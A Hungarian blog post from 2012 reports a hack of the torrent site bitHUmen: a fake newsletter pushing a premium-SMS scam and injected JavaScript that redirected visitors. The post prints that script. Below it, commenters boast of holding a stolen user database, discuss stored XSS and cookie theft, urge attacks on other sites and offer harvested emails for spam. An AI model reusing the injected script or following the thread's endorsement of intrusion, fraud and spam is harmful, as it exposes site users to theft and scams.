Hamis bitHUmen hírlevélről kaptunk bejelentést. Többen jelezték, hogy a mai napon egy a bH szokásos hírlevelére megszólalásig hasonlító levél érkezett, amelyben emelt díjas sms küldésére próbálják rávenni a felhasználókat.
Fontos azonnal leszögezni, hogy az email természetesen nem valós, erről az oldalon is olvashattok a híreknél.
Az email természetesen kamu, nem vezettünk be semmilyen SMS támogatást.
Aki azt tapasztalja, hogy az oldalon használt email címére érkezett a levél, annak javasoljuk, hogy változtassa meg a jelszavát, esetleg azonosítókulcsát is.
Ami ezen felül aggasztó, hogy a levelek a bH-n regisztrált email címekre érkeznek és a levélben kiküldött adatok valósak (kivéve a regisztrációt), illetve az oldalon sokan kaptak privát üzenetet is, ami ugyanezt a szöveget tartalmazza:
Meghibásodott az egyik biztonsági szerver és igen drága a költsége. Sürgősen ki kellene cserélni, mert így nem biztonságos az oldal használata. Mivel az oldalon nincs támogatási rendszer és nem is vezetjük be emiatt, ezért létrehoztunk egy ideiglenes emeldíjas sms számot.
Az üzeneteket ráadásul pár perce (2012-03-07 09:11:02) küldték ki, így az oldal valószínűleg jelenleg is sebezhető állapotban van.
Frissítve: törölték a hamis pm-eket
Frissítve 2 (10:10):
Még mindig nagy a baj, belépve a bH-ra az oldal azonnal átirányít egy ingyenes tárhelyre, ahol a már ismert üzenet fogad, hogy a szerver tönkrement, támogassátok az oldalt.
Az átirányítást az oldal forráskódjába ágyazott idegen JavaScript okozza, amit a támadó a szavazásnál illesztett be.
A Js tartalma:
document.write(‘<meta http-equiv=”refresh” content=”0; url=http://bithumen.be/logout.php” style=”visibility:hidden;display:none”>’);
document.write(‘<meta http-equiv=”refresh” content=”0; url=http://bithumeninfo.try.hu/” style=”visibility:hidden;display:none”>’);
Frissítve 3 (10:40):
Eltűnt a forrásból az átirányító JS.
Egyes userek a főoldalon láttak még hamis “1 új üzeneted érkezett” blokkot:
Tudom tudtok róla, de elég zavaró a főoldalon a felirat: ” 1 új üzeneted van! piros kerettel” holott ez nem is valódi, csak átirányít!
Frissítve 4 (11:02):
Újabb hiba, létrehoztak egy topicot (Milyen magyar Warez oldalakat ismersz?), amit megnyitva szintén átirányítja a látogatót az oldal.
Érintett fájl lehet a publog.php is.
Frissítve 5 (12:38):
Egy hozzászólás és a mellékelt kép alapján van rá esély, hogy megszerezték a behatolók az adatbázist. Nem tudjuk megerősíteni, viszont aki kicsit utánanéz, a név és user id töredékeknek láthatja, hogy egyezés van a kép és az éles adatok között.
Frissítve 6 (12:59):
Az oldal pár perce nem elérhető.
Frissítve 7 (14:23):
Az oldal újra él és virul.
Frissítve 8 (14:59):
Az oldal egy adminisztrátora szerint nem történt adatlopás, a támadók nem fértek hozzá az adatbázishoz.
március 11, 2012 at 10:17 de.
FBI
kamu statisztikával az élre törtök 😀 hajrá microbi 😀 sztem írjatok be egyből 10 millió peert az is hihető lenne 😀
március 11, 2012 at 10:20 de.
Kedves @HiHi,
Szeretnélek üdvözölni a csapatban. Már így is sok a “hacker” a csapatban, de nem baj. Az a baj ezekkel a “Hackerekkel”, hogy a legtöbbnek nincs meg az alap műveltség a php, mysql kezeléséhez. Sőt, a legtöbbnek még a html se megy. Engem is script kiddie-ként tartanak számon, de ezeket a vádakat tagadom. Nekem az alap ismeretem (és ennél sokkal több, mivel nem csak az alap dolgokat tudom megírni) megvan. Én írtam már saját kódokat is, saját cms rendszert, illetve saját fórumot is. Fejlesztettem nem pistike oldalakon is, de persze névtelenül. Valóban nincs feltörhetetlen oldal ez tény, de egy egyedi motort, ami saját elképzeléssel működik, mint például az nCore sokkal nehezebb feltörni, mint egy olyan motort, aminek mindenki ismeri a felépítését. (TBDev, stb…). Ha olyan nagy “hacker” vagy ahogy mondod, akkor miért nem mutatod meg a tudásodat a netcigány oldalakon? Például kezdhetnéd a Dark-angel nevezetű oldallal, ami természetesen nekem már sikerült.
Üzenem nektek, hogy ne féljetek HiHi-től. Ő sem tud többet, mint KillerStar, cyraxx, stb…
Tisztelettel,
csakazasvatudja
március 11, 2012 at 10:24 de.
Tényleg, ezt a Dark-angel -t , és a Teracodot nem tudná már valaki végleg meg hackelni? Undorító egy netcigány oldalak..
március 11, 2012 at 10:30 de.
Nem is tudnád mennyire egyszerű root jelszava dark-angelen:)
március 11, 2012 at 10:34 de.
akkor hajrá:)
március 11, 2012 at 10:56 de.
@HiHi:
CURL for ciklussal? Legalább biztosak lehetünk abban, hogy adatbázishoz nem fértél hozzá. Ha mégis, akkor az SQL csodákra képes, és nem 10 óráig tartana a teljes felhasználói adatbázis lementése. Szóval ha nem fértél hozzá, akkor viszont magasabb rangú felhasználónak szerezted meg a jelszavát. Így viszont teljesen logikus az egész, ezért van kama szaga a szövegednek, és ezért olyan a stílusuk, mint amilyen a Bh-soknak, mert hibáztak.
Vagy B változat, semmi közöd az egészhez.
Btw a CURL FOR(szigorúan nagybetűvel) ciklussal, nem olyan nagy szám, hogy ki kelljen emelni. A Regexp sem éppen, olyan srácos attention whore szaga van.
Remélem azért a Bh-n nem az említett MDA5-t használják, ha már hashelnek.
március 11, 2012 at 11:22 de.
Az miért baj, ha néha meg emeljük manuálisan a peer számot, szerintetek bh -n nem azt teszik? Több torrentünk is van mint Bh nak.
március 11, 2012 at 11:33 de.
Csak, hogy tisztázzuk. Hátha valaki megpróbálja, hogy Dark-Angel annyira faszán megvan csinálva, hogy még a sütilopás is működik ott, de ha jobban megfigyelitek rájöttök, hogy injectet is benyeli.
március 11, 2012 at 12:26 du.
@csakazasvatudja
..a minimum az lenne, hogy mielőtt hackernek nevezitek magatokat, utánanéztek, hogy kit neveznek annak..
március 11, 2012 at 12:50 du.
No Comment
a minimum az lenne, ha nem beszélnél zöldeket..
március 11, 2012 at 12:50 du.
slider, tomper igazi sysop volt te csak utánzat vagy
március 11, 2012 at 13:07 du.
@FBI
Gondolom az a legújabb hack, hogy más nevében írkáltok.
március 11, 2012 at 13:18 du.
No Comment
Sok időd van itt lógni cyberfucker.
március 11, 2012 at 13:20 du.
Jajj, mennyi okos ember van itt kérem, a karrier tanácsadók oldalain meg rengeteg a betöltetlen állás mesterszintű informatikai állásoknál. Ez csak 3 dolgot jelenthet:
– valójában nem léteznek azok az állások(amit eléggé kötve hiszek ilyen magas szintű tudást igénylő pozíció mellett)
– nem akarnak dolgozni ezek az emberek
– valójában nem olyan okosak itt az emberek, mint amennyire hiszik magukat.
@ruszki: “Legalább biztosak lehetünk abban, hogy adatbázishoz nem fértél hozzá.” – vagy nem tudja pontosan leírni, hogy mit is csinált. Ez alapvető gond az ilyen “hackereknél” és azt én is néztem, hogy egy állítólagos, 90 ezer körüli adatbázis lementésében mi is tart 10 óráig. Ez nekem sem fér a fejembe. Az én köreimben ilyen 300000-es adatbázisok fél óra alatt mennek és nem hinném, hogy a BH szervere annyira lassú lenne, hogy azoknál lassabb legyen, tekintve, hogy elég sok usert kiszolgál. Valamit nem jól csinált a srác, az biztos.
@robcsa: hakker? Nem hacker? másik meg az, hogy elég nagy baj, ha oldalakon egy hacker kér számon bármit, ott, ahol felhasználók 10 ezreinek személyes adatait tárolja a szerver.
@FBI az oldalatokat nem ártana tényleg egy kicsit rendbe szedni, vírusos állományoktól megtisztítani. Tudok kapásból írni minimum 1 torit, amiben van vírus. A statot meg nem értem, hogy mi értelme van növelni és miért jó az, ha az nCore-nál magasabbra törtök.
március 11, 2012 at 13:30 du.
@No Comment
Georgina, vagy Róbert. Megkérnélek, hogy inkább a bezárt oldaladdal (HeroBIT) törődj, aminek még mindig fizeted a gépét, mert nem tudod lemondani. Tudjuk, hogy hiányzik az alap angol tudás hozzá, de mindegy. Nekem legalább vannak egyedi elképzeléseim egy oldal feltörésénél, nem úgy, mint cyraxnak, killerstarnak, hihinek, vagy a töbi kiddie hackernek. Én soha nem voltam hacker, de azért ezeknél a “Hacker”-eknél jóval többet tudok, szerintem. Kíváncsi lennék, hogy te mennyit tudsz, mert eddig csak osztod az észt, de fogadjunk, hogy még a Hello World se menne neked. Pedig az már tényleg egy alap.
Pusszantalak,
csakazasvatudja
március 11, 2012 at 13:30 du.
@FBI
Sajnos nincsen sok. Ne erőltesd az angolt, ha nem megy.
március 11, 2012 at 13:31 du.
*többi kiddie hackernek. – javítva
március 11, 2012 at 13:34 du.
@csakazasvatudja
Ez sajnos nem talált. Sosem volt közöm ilyen téren torrentoldalhoz. A copy-paste nekem is menne ha megerőltetném magam. 😀
március 11, 2012 at 13:36 du.
na no comment, most meg kaptad.. jobb lesz, ha ki húzod inkább a net kábelt otthon.
március 11, 2012 at 15:49 du.
@No Comment
Nem kell balhézni veled, mert felesleges. Én tudom, amit tudok. Persze nem vagyok mindentudó, de biztos, hogy többet tudok nálad. Voltam valamikor én is copy & paste programozó, legjobb tudomásom szerint 1,5 – 2 éve, de azóta már tényleg érdekel engem ez a része, és tényleg valamilyen szinten értek hozzá. Nem kell bizonygatni. Neked megvan a véleményed, és nekem is megvan. Ennyi, de ez egy blog, és nem mindenkinek lehet egy véleménye.
Aláírás,
csakazasvatudja
március 11, 2012 at 16:56 du.
@csakazasvatudja
Ha olyan okosnak tartod magad miért csak a szád jártatod?
Amúgy meg hol olvastátok, hogy én hackernek tartom/nevezem magam?
Szerintem egy olyan ne pofázzon bele aki a két forráskódot amit be posztoltam azt nem értette meg.
Ha így lett volna akkor más véleményed lenne. De halvány lila fi*god sincs a komolyabb dolgokról.
De felőlem olyan okosnak tartod magad amilyennek csak akarod.
március 11, 2012 at 18:06 du.
@HiHi
Saját nevedet nem tudod leírni két változóba és azt kiíratni.
március 11, 2012 at 18:19 du.
Legyen igazad, bár nagyon úgy sejtem, hogy ez a túlzott ellenszenv azért van mert vagy elküldtél 1 sms-t, vagy mert nem te csináltad ezt. Tudod mit, ha olyan ügyes vagy, mutass valamit ne csak a szádat jártasd.
március 11, 2012 at 18:26 du.
Hihi, hány ft-ot sikerült lekaszálnod smsbe a diliktől ?:D
március 11, 2012 at 18:28 du.
@HiHi
Hidd el, hogy 1 db sms-t nem küldtem el. Én nem a naiv felhasználók közé tartozok. De várom a fent említett kódot, hogy írd meg. Amúgy meg sütit lopni nem nagy tudomány ezt én jelzem neked. 🙂
március 11, 2012 at 18:33 du.
Ezek szerint akkor nem csak en vagyok netcigany? Pedig probalkoztam mar mindennel,spammelessel,sms reggel,tamogatassal stb..
március 11, 2012 at 18:41 du.
http://pastebin.com/iKG0Ta9C
HiHi, én írtam neked gyorsba. Most te írj nekem valami olyat, ami engem sérteget.
március 11, 2012 at 18:43 du.
@FBI
Ha tényleg az az FBI vagy akkor ideje lenne kicsit rendbeszedni a szemétdombodat! Már nagyon gáz ami ott folyik!
március 11, 2012 at 18:45 du.
Archer
HiHi -nek még tanulnia kell tőled, ő még csak kezdő 🙂
március 11, 2012 at 18:47 du.
@Soul
Rendbe szedném én, de kicsixnek és sektornak így a jó. Egyre gázosabb az oldalunk tudom, de azért még bízunk a felhasználóinkban.
március 11, 2012 at 19:21 du.
Archer
Gondolkodunk mi is sms regen, mennyit lehet vele kaszírozni kb. havonta?
március 11, 2012 at 19:46 du.
A Diablo torrenten nap 15-20 db 380 Forintos sms-t kapnak SMS reg által.
március 11, 2012 at 19:51 du.
FBI
szerintem több pénzt szednétek vele mint a mail címekkel. 🙂 Mindig lesznek balekok 🙂
március 11, 2012 at 21:22 du.
tökjó, folyamatosan törlődnek hsz-k. Miért nem az egészet törlitek, így nagyon nincs értelme
március 11, 2012 at 21:46 du.
robcsa
Az meglehet, azért az sem rossz bevétel, jut eszembe ha valakit érdekelnek mail címek spammelés miatt az micron keressen meg.
március 11, 2012 at 21:56 du.
HDevo írta.:
2012-03-11 – FIGYELEM!
Aki email-ben, irc-n, PM-ben vagy akármilyen formában üzenetet kap hogy bármilyen információt adjon meg az oldalról (nem feltétlenül csak a saját accountját illetően), NE VÁLASZOLJON! A staff soha nem kér infot senkitől, amennyiben ilyen üzenetet kaptok, AZ KAMU! Egy magát markovicsnak nevező jelentéktelen kis akárki szórakozik évek óta torrentoldalakkal, és jelenleg úgy tűnik, minket szemelt ki magának – fentiekhez hasonló agyas módszerei vannak (mert hackelni szegényke egy dekányit se tud), sajnos viszont van ahol sikerrel járt ezekkel is.
Fentiek be nem tartása AZONNALI KITILTÁST von maga után!
március 11, 2012 at 22:19 du.
HiHi
de Diablo torrent oldalnak álcázott warez oldal. 🙂
március 12, 2012 at 8:02 de.
macsk (azaz markovics)
Szánalmas vagy kisgyerek. Na mi van, bh után mi következtünk?
március 12, 2012 at 8:47 de.
@Suicid – az, hogy buta vagy még megértem, azt, hogy még pár ember rajtad kívül is buta, azt is megértem.
Szóval miért butázlak le? Mert aki halvány lila fingot ért az egészhez mint te, az csak annyit tud mondani, hogy
markovics… hogy miért emlegetitek egy szerencsétlennek a nevét? Mert ő volt az egyetlen akiről lehet hallottatok. Tehát mi indul be az ilyen paraszt droid eszében azonnal:
Torrent =====> Hacker? == Markovics!
Tehát ennyi esze van a legtöbb alpári nyúl embernek! Tisztelet a kivételnek aki nem szól bele olyasmibe amit nem tud.
Magyarul: nem Pistikézel le olyan valakit akit nem Pistikének hívnak.
Kíváncsi vagyok, hogy számodra mit jelent: “Na mi van, bh után mi következtünk?”
Mert ti kik vagytok? Ti lennétek a fent említett HDevo? Mert ha igen, akkor beszerzek egy accountot oda is, és körülnézek.
március 12, 2012 at 9:11 de.
@HiHi
Vicces vagy, te kis script kiddie .. Szerezz be egyet, és akkor kiderül mire vagy képes,de addig se jártasd üresbe az arcodat..
március 12, 2012 at 11:10 de.
@Hihi
Szeretném a közeljövőben tesztelni a webapplikációm biztonságát. Lenne esetleg kedved hozzá?
Ha igen ide dobj egy mailt pls: viktor21.test [at] gmail.com
Köszi, üdv,
Viktor
március 12, 2012 at 13:01 du.
Sajnos a majomparádé is meg fog szűnni.
március 12, 2012 at 15:58 du.
én csak egy script kiddie vagyok. semmihez nem értek.
március 12, 2012 at 16:55 du.
látjátok. sütilopást se tudok segítség nélkül.
március 12, 2012 at 17:31 du.
Visszaélhetsz a nevemmel 🙂 nem izgat.
március 12, 2012 at 17:55 du.
Utolsó akció! Aki ma törli magát microbitről annak nem használom fel a mail címét spammelésre. Én vagyok a microbit tulaja!
március 12, 2012 at 18:06 du.
Éjjeli ovi van látom.
március 12, 2012 at 18:42 du.
@HiHi
Még mindig nem válaszoltál a postomra.
március 12, 2012 at 20:01 du.
A kódot jó pár ember látta, bár belegondoltam, minek posztoljam ki újra.
1. Törölni fogják
2. Csak visszaélnél vele, ahogy most már elnézlek.
3. Eszembe jutott, hogy annó amikor a pontpark.hu-hoz írtam kódot ami automatikusan azonnal minden
hirdetésért kiosztja a pontot akkor is voltak ilyen frájer hülye gyerekek, annyira erőltetve próbálták bizonyítani, hogy fake meg kamu, hogy publikáltam a forrást akkor is. És aztán hopp azonnal kiderült, hogy nem más minta pont part tulajdonosa verte a belét, csak azért, hogy a forrásból megtudja, hogy mint kell javítani.
Szóval, neked mit üzenek: volt rá lehetőséget megnézni a forrás kódot, nem egészen fél napig de kint voltak
a pastebin linkek. Jó pár ember ember meg is nézte.
Egyáltalán nem zavar, hogy okosabbnak tartod magad, még hogy önálló gondolataid vannak?
Tudod nekem is vannak, csak én meg is valósítom őket!
Aztán épp leszarom, hogy script kiddienek hívtok, vagy akárminek, esetleg visszaéltek itt a nevemmel.
Nem zavar. Ja és nem neveztem magam hackernek, és nem kértem az elismeréseteket, csak annyit mondtam, hogy
megvan a teljes user adatbázis! Az, hogy milyen módon jutottam hozzá publikálva volt.
És számomra lényegtelen, hogy te 1 perc alatt dumpolod a szaros phpmyadminodban az adatbázisod, de tudod.
A phpmyadmin nem feltétele az adatbázis hozzáférésnek.
Hogy idézzek tőled egy butaságot:
csakazasvatudja írta:
Csak, hogy tisztázzuk. Hátha valaki megpróbálja, hogy Dark-Angel annyira faszán megvan csinálva, hogy még a sütilopás is működik ott, de ha jobban megfigyelitek rájöttök, hogy injectet is benyeli.
Gondolom nagyon sok ész kellet ehhez a felfedezéshez.
Gondolkodj már hülye gyerek: ha egy external js scriptet betudod importálni inputon keresztül, akkor egyértelmű, hogy mindent benyel, mivel az adatbázisban tárolja escapelés nélkül.
Csak azért mert egy hangyafingnyit lehet értesz a webprogramozáshoz, és tudod mi az a phpmyadmin, sőt lehet találtál néhány hibát egy pár torrent oldalon, még nem jelenti azt, hogy PRO vagy és mindenkit kioktathatsz!
Ha majd én is hülyeségeket írok, akkor szóljatok be, hogy “hé te hülye ez marhára nem így van honnan szedsz ilyen badarságot”. Ezzel nem akarom azt mondani, hogy én vagyok a mindent tudó PRO de azért olyat nem mondok amit nem tudok biztosan.
Mellesleg még megcáfolnám egy másik kijelentésed, látszik, hogy itt ott figyeltél csak be.
Én NEM csak torrent oldalakkal foglalkozóm, sőt ez csak mellékes. De a legtöbb torrent oldal részben vagy teljesen egy alapra épűl amit csak feltöltöttek a szerverre és azt szerkesztgetik az idő során.
Még egyszer elmondom, az ócsárolással, a nevemben való írással rajtam még nem változtattok. Sőt ebből annyit tudok levonni, hogy nagyon-nagyon haragudtok.
És akkor mindig jelen van néhány haragos kategória.
A következő okok miatt vannak ki miattam.
– Mert meg lettek károsítva
– Mert a kedvenc oldaluk ellen indult támadás
– Mert nem ő vagy ők voltak akik ezt csinálták hanem én
– Mert lehetséges, hogy egy bizonyos pénzösszeget kerestem ezzel és ez nem az ő vagy az ők számlájára megy?
– Mert nekem megvan az adatbázis neki vagy nekik meg nincs
– Mert rájött néhány ember, hogy régóta kitartóan próbált ilyesmit csinálni és neki nem sikerült.
Ha tud valaki még néhány indokot az ellenszenvességre akkor hallgatom.
Bizony így van, a rosszindulat nem feltétlen egy okból eredhet.
március 12, 2012 at 20:53 du.
mit akarsz csinálni az adatbázissal, vagy miért törted fel ilyen látványosan az oldalt ha csak tesztelni akartad magad?